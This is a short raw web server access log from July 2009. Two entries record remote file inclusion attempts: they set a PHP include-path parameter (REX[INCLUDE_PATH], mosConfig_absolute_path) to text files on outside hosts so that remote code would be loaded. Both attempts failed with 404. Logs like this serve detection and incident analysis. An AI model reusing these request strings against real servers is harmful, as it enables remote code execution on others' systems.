218.234.21.178 - - [06/Jul/2009:05:47:26 -0400] "GET /logs/access_log.Q109053100//include//functions.inc.php?REX[INCLUDE_PATH]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.98.59.178 - - [06/Jul/2009:05:47:29 -0400] "GET /logs/error_log.Q109052600%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 291 "-" "libwww-perl/5.811"
66.249.68.247 - - [06/Jul/2009:05:47:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3130094C728384008C41018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [06/Jul/2009:05:47:45 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3130094C7263D4008141018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
